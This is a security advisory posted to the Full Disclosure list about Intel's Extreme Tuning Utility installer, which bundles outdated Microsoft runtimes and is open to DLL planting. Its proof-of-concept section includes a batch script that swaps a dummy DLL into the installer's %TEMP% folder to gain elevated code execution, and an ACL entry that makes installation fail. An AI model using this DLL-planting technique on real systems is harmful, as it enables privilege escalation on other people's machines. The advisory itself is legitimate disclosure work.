[<prev] [next>] [day] [month] [year] [list]
Message-ID: <778DC9E75C6E40CC90DC1031E0BA90B5@W340>
Date: Wed, 26 Sep 2018 20:31:29 +0200
From: "Stefan Kanthak" <stefan.kanthak@...go.de>
To: <bugtraq@...urityfocus.com>
Cc: fulldisclosure@...lists.org
Subject: [FD] Executable installers are vulnerable^WEVIL (case 57):
arbitrary code execution WITH escalation of privilege
viaIntel Extreme Tuning Utility
Hi @ll,
the executable installer of the Intel Extreme Tuning Utility,
version 6.4.1.23 (Latest), released 5/18/2018, available from
<https://downloadmirror.intel.com/24075/eng/XTU-Setup.exe> via
<https://downloadcenter.intel.com/download/24075/Intel-Extreme-Tuning-Utility-Intel-XTU->
is (SURPRISE!) vulnerable.
CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Vulnerability #0:
=================
The executable installer XTU-Setup.exe comes with at least two
OUTDATED and UNSUPPORTED runtime components from Microsoft, one
of which has known and long fixed vulnerabilities!
Component #1:
~~~~~~~~~~~~~
Microsoft SQL Server Compact 3.5 SP2 ENU
This is end-of-life since 4/10/2018; see
<https://support.microsoft.com/en-us/lifecycle/search?alpha=Microsoft+SQL+Server+Compact+3.5>
Component #2:
~~~~~~~~~~~~~
Microsoft Visual C++ 2005 Runtime 8.0.50727.762
Visual C++ 2005 is end-of-life since 4/12/2016, more than TWO
years ago; see
<https://support.microsoft.com/en-us/lifecycle/search?alpha=Microsoft+Visual+C%2B%2B+2005>
The latest Visual C++ 2005 Runtime is version 8.0.50727.4940,
published 4/12/2011, updated, 6/14/2011, i.e. SEVEN+ years ago.
See <https://support.microsoft.com/en-us/help/2467175>
and <https://support.microsoft.com/en-us/help/2538242/ms11-025-description-of-the-security-update-for-visual-c-2005-sp1-redi>
Also see
<https://support.microsoft.com/en-us/help/2977003/the-latest-supported-visual-c-downloads>
<https://support.microsoft.com/en-us/help/2661358/minimum-service-pack-levels-for-microsoft-vc-redistributable-packages>
The icing on the cake: XTU-Setup.exe tries to install the OUTDATED
and VULNERABLE Microsoft Visual C++ 2005 Runtime 8.0.50727.762 even
if a newer version is already installed!
That's a pretty good example for AWFUL BAD software engineering!
Vulnerability #1:
=================
The vcredist_x86.exe package included in XTU-Setup.exe and executed
by it was built with Wix toolset 3.6
See <http://seclists.org/bugtraq/2016/Jan/105>
and <https://www.firegiant.com/blog/2016/1/20/wix-v3.10.2-released/>
I recommend to exercise ENHANCED INTERROGATIONS with Microsoft about
their SLOPPY attitude to software security: the fixes were released
about 2.5 years ago, in cooperation with Microsoft, FireGiant and me,
but Microsoft failed or was to lazy to update their installer packages.
Demonstrations/proof of concepts:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
These are for STANDARD installations of Windows, i.e. where the
user account created during Windows setup is used.
This precondition is met on typical installations of Windows:
according to Microsoft's own security intelligence reports, about
1/2 to 3/4 of the about 600 million Windows installations which
send telemetry data have only ONE active user account.
See <https://www.microsoft.com/security/sir>
A) for the arbitrary code execution with elevation of privilege
---------------------------------------------------------------
1. follow the instructions from
<https://skanthak.homepage.t-online.de/minesweeper.html>
and build the non-forwarding DLLDUMMY.DLL in your %TEMP%
directory;
2. create the following batch script:
--- wixstdba.cmd ---
:WIXSTDBA
@if not exist "%temp%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.ba1\wixstdba.dll" goto :WIXSTDBA
copy "%TEMP%\dlldummy.dll" "%temp%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.ba1\wixstdba.dll"
--- EOF ---
3. run the batch script per double click;
4. run XTU-Setup.exe: notice the message boxes displayed from the
WIXSTDBA.DLL copied into the subdirectory of %TEMP%.
B) for the denial of service
----------------------------
1. add the NTFS access control list entry (D;OIIO;WP;;;WD) meaning
"deny execution of files in this directory for everyone,
inheritable to all subdirectories" to the (user's) %TEMP%
directory.
NOTE: this does NOT need administrative privileges!
2. execute XTU-Setup.exe: notice the message box displaying the
failure of the installation about 3/4 way through.
STAY FAR AWAY FROM INTEL'S VULNERABLE CRAPWARE!
stay tuned
Stefan Kanthak
Timeline
~~~~~~~~
2017-09-04 vulnerability report sent to Intel
no answer, not even an acknowledgement of receipt
2018-03-22 vulnerability report resent to Intel
2018-05-18 updated installers published by Intel, but no security
advisory
2018-06-05 vulnerability report for the updated but still vulnerable
installers sent to Intel
2018-09-11 security advisory published by Intel:
<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00162.html>
2018-09-26 own security advisory published
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists